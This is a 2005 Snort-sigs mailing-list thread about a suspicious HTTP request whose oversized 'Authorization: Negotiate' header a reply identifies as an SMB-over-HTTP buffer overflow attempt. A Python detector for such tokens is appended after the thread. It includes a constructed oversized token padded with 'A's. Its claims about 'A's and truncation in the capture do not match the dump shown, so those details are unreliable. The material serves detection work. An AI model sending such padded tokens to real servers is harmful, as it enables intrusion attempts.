RE: [Snort-sigs] Authorization overflow ?

Subject: RE: [Snort-sigs] Authorization overflow ?
Date: Mon, 8 Aug 2005 07:36:27 -0500
This looks remarkably like an SMB Over HTTP Buffer Overflow attempt. Check out the following link.

http://isc.sans.org/diary.php?date=2005-06-03


Tommy Thompson
Senior Infosec Analyst
GNSC Net Defense Correlation
Scott AFB, IL
(618) 229-8743/8744, DSN: 779-XXXX
Email: gnsc-nd_correlation@disa.mil


-----Original Message-----
From: rmkml [mailto:rmkml@free.fr]
Sent: Monday, August 08, 2005 5:38 AM
To: Snort-sigs@lists.sourceforge.net
Subject: [Snort-sigs] Authorization overflow ?


Hi,

I received this HTTP request:

17:38:18.047054 83.81.37.203.1574 > x.x.x.x.80: . [tcp sum ok] 
4038566652:4038568112(1460) ack 3750935641 win 64240 (DF) (ttl 117, id 
53120, len 1500)
GET / HTTP/1.0\r\nHost: x.x.x.x\r\nAuthorization: 
Negotiate 

17:38:18.055464 83.81.37.203.1574 > x.x.x.x.80: . [tcp sum ok] 
4038568112:4038569572(1460) ack 3750935641 win 64240 (DF) (ttl 117, id 
53121, len 1500)

17:38:18.101453 83.81.37.203.1574 > x.x.x.x.80: . [tcp sum ok] 
4038569572:4038571032(1460) ack 3750935641 win 64240 (DF) (ttl 117, id 
53123, len 1500)

17:38:18.110442 83.81.37.203.1574 > x.x.x.x.80: FP [tcp sum ok] 
4038571032:4038572350(1318) ack 3750935641 win 64240 (DF) (ttl 117, id 
53124, len 1358)

New exploit?

I use snort240b18 with rule24:
08/07-17:38:18.055464  [**] [119:15:1] (http_inspect) OVERSIZE REQUEST-URI 
DIRECTORY [**] {TCP} 83.81.37.203:1574 -> x.x.x.x:80


Regards
Rmkml


-------------------------------------------------------
SF.Net email is Sponsored by the Better Software Conference & EXPO
September 19-22, 2005 * San Francisco, CA * Development Lifecycle Practices
Agile & Plan-Driven Development * Managing Projects & Teams * Testing & QA
Security * Process Improvement & Measurement * http://www.sqe.com/bsce5sf
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs


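A defender-side check for the kind of request discussed in this thread, added here as an example and not code from the thread, from Snort or from the SANS diary: it pulls the Authorization: Negotiate token out of an HTTP request, base64-decodes it even when the capture is cut short (as the dump above is), and flags tokens that are far larger than a real SPNEGO token or consist mostly of one repeated byte, which is what the long run of 'A's in the capture decodes to. The size and run-length thresholds, the helper names and the two sample requests are assumptions constructed for the example; the 0x60 first-byte check is the GSS-API InitialContextToken tag ([APPLICATION 0]) from RFC 2743.

```python
import base64
import re

# Thresholds are assumptions for this example (not Snort or RFC values): a real
# SPNEGO token is normally well under 4 KB and never a long run of one byte.
MAX_TOKEN_BYTES = 4096
MAX_REPEAT_RUN = 64
HEADER_RE = re.compile(rb"^Authorization:[ \t]*Negotiate[ \t]+(\S+)", re.I | re.M)

def extract_negotiate_token(request: bytes):
    """Return the base64 text of the first 'Authorization: Negotiate' header, or None."""
    m = HEADER_RE.search(request)
    return m.group(1) if m else None

def decode_lenient(b64: bytes) -> bytes:
    """Decode base64 that may be cut short, as the dump above is ('...')."""
    b64 = re.sub(rb"[^A-Za-z0-9+/]", b"", b64)  # drop '=' padding and stray bytes
    if len(b64) % 4 == 1:                       # a lone trailing char cannot decode
        b64 = b64[:-1]
    return base64.b64decode(b64 + b"=" * (-len(b64) % 4))

def longest_run(data: bytes):
    """Return (byte value, length) of the longest run of one repeated byte."""
    best, cur_val, cur_len = (-1, 0), -1, 0
    for b in data:
        cur_val, cur_len = (b, cur_len + 1) if b == cur_val else (b, 1)
        if cur_len > best[1]:
            best = (cur_val, cur_len)
    return best

def assess_request(request: bytes) -> dict:
    """Flag a Negotiate token that is oversized or padded with one repeated byte."""
    token = extract_negotiate_token(request)
    if token is None:
        return {"negotiate": False, "suspicious": False}
    raw = decode_lenient(token)
    val, run = longest_run(raw)
    oversize, padded = len(raw) > MAX_TOKEN_BYTES, run > MAX_REPEAT_RUN
    return {"negotiate": True, "gssapi_tag": raw[:1] == b"\x60",  # [APPLICATION 0]
            "decoded_len": len(raw), "run_byte": val, "run_len": run,
            "oversize": oversize, "padded": padded, "suspicious": oversize or padded}

def request_with_token(raw: bytes) -> bytes:
    """Build a constructed HTTP request carrying raw as its Negotiate token."""
    return (b"GET / HTTP/1.0\r\nHost: x.x.x.x\r\nAuthorization: Negotiate "
            + base64.b64encode(raw) + b"\r\n\r\n")

# Constructed samples: a 0x60 tag followed by 5000 'A's, versus a short token.
SAMPLE_PADDED = request_with_token(b"\x60\x82\x10\x7a" + b"A" * 5000)
SAMPLE_SHORT = request_with_token(b"\x60\x82" + bytes(range(198)))
```

On a live sensor the same two measures (decoded token length and longest single-byte run) can be applied per header without the constructed samples; the http_inspect alert quoted above fires only on the URI, not on the header that actually carries the payload.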